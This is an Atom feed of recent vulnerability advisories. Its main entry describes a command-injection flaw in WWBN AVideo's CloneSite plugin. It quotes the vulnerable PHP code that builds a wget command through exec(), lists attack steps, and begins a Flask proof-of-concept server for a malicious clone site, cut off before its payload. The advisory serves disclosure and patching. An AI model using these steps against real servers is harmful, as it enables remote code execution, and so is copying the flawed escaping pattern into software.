<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-08T16:41:00.823529+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-292668</id>
    <title>EUVD-2026-292668</title>
    <updated>2026-10-08T16:41:00.870299+00:00</updated>
    <content>EUVD-2026-292668</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-292668"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-41304</id>
    <title>fkie_cve-2026-41304</title>
    <updated>2026-10-08T16:41:00.870341+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>WWBN AVideo is an open source video platform. In versions 29.0 and below, the `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection. An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to Remote Code Execution (RCE) on the server. Commit 473c609fc2defdea8b937b00e86ce88eba1f15bb contains a fix.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-41304"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-xr6f-h4x7-r6qp</id>
    <title>GHSA-xr6f-h4x7-r6qp — WWBN AVideo: RCE cause by clonesite plugin</title>
    <updated>2026-10-08T16:41:00.870378+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Packagist: wwbn/avideo</p>
<p>Description</p>
<p>## Summary</p>
<p>The `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection.</p>
<p>An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to **Remote Code Execution (RCE)** on the server.</p>
<p>## Details</p>
<p>Inside `plugin/CloneSite/cloneClient.json.php`(line112) didn't have proper sanitization</p>
<p>```php
$objClone-&gt;cloneSiteURL = str_replace("'", '', escapeshellarg($objClone-&gt;cloneSiteURL));
```</p>
<p>use `str_replace ` make `'` added by `escapeshellarg` become ` ` so hacker can inject evil `cloneSiteURL` to rce</p>
<p>```php
$sqlURL = "{$objClone-&gt;cloneSiteURL}videos/clones/{$json-&gt;sqlFile}"; \\116
$cmd = "wget -O {$sqlFile} {$sqlURL}"; \\117
exec($cmd . " 2&gt;&amp;1", $output, $return_val);                 \\119
```</p>
<p>The attack flow</p>
<p>1. make a evil site to provide date</p>
<p>2. add  evil url in `objects/pluginAddDataObject.json.php`</p>
<p>3. access `plugin/CloneSite/cloneClient.json.php` to trigger rce</p>
<p>## Poc</p>
<p>make a evil site use python like this</p>
<p>```python
from flask import Flask, jsonify, request</p>
<p>app = Flask(__name__)</p>
<p>@app.route('/', defaults={'path': ''})
@app.route('/&lt;path:path&gt;')
def catch_all(path):
    print("PATH:", path)</p>
<p>return jsonify({
            "error": False,
            "msg": "",…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-xr6f-h4x7-r6qp"/>
  </entry>
</feed>
